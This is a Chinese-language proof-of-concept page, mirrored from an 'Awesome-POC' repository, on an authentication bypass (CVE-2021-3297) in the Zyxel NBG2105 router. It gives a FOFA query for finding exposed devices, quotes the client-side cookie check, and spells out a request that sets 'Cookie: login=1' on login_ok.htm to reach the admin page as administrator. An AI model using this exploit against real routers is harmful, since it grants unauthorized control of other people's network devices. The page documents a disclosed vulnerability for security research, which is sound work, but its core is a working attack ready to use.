mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
51 lines
1023 B
Markdown
51 lines
1023 B
Markdown
# Zyxel NBG2105 身份验证绕过 CVE-2021-3297
|
|
|
|
## 漏洞描述
|
|
|
|
Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现后台登陆
|
|
|
|
## 漏洞影响
|
|
|
|
```
|
|
Zyxel NBG2105
|
|
```
|
|
|
|
## FOFA
|
|
|
|
```
|
|
app="ZyXEL-NBG2105"
|
|
```
|
|
|
|
## 漏洞复现
|
|
|
|
登录页面如下
|
|
|
|

|
|
|
|
其中前端文件 **/js/util_gw.js** 存在前端对 Cookie login参数的校验
|
|
|
|

|
|
|
|
可以看到检测到 Cookie中的 **login=1** 则跳转 home.html
|
|
|
|
```plain
|
|
function setCookie() //login_ok.htm use
|
|
{
|
|
document.cookie="login=1";
|
|
MM_goToURL('parent', 'home.htm');
|
|
}
|
|
```
|
|
|
|
请求如下则会以管理员身份跳转到 **home.htm页面**
|
|
|
|
```plain
|
|
http://xxx.xxx.xxx.xxx/login_ok.htm
|
|
|
|
Cookie: login=1;
|
|
```
|
|
|
|

|
|
|
|
## 参考文章
|
|
|
|
https://github.com/nieldk/vulnerabilities/blob/main/zyxel nbg2105/Admin bypass |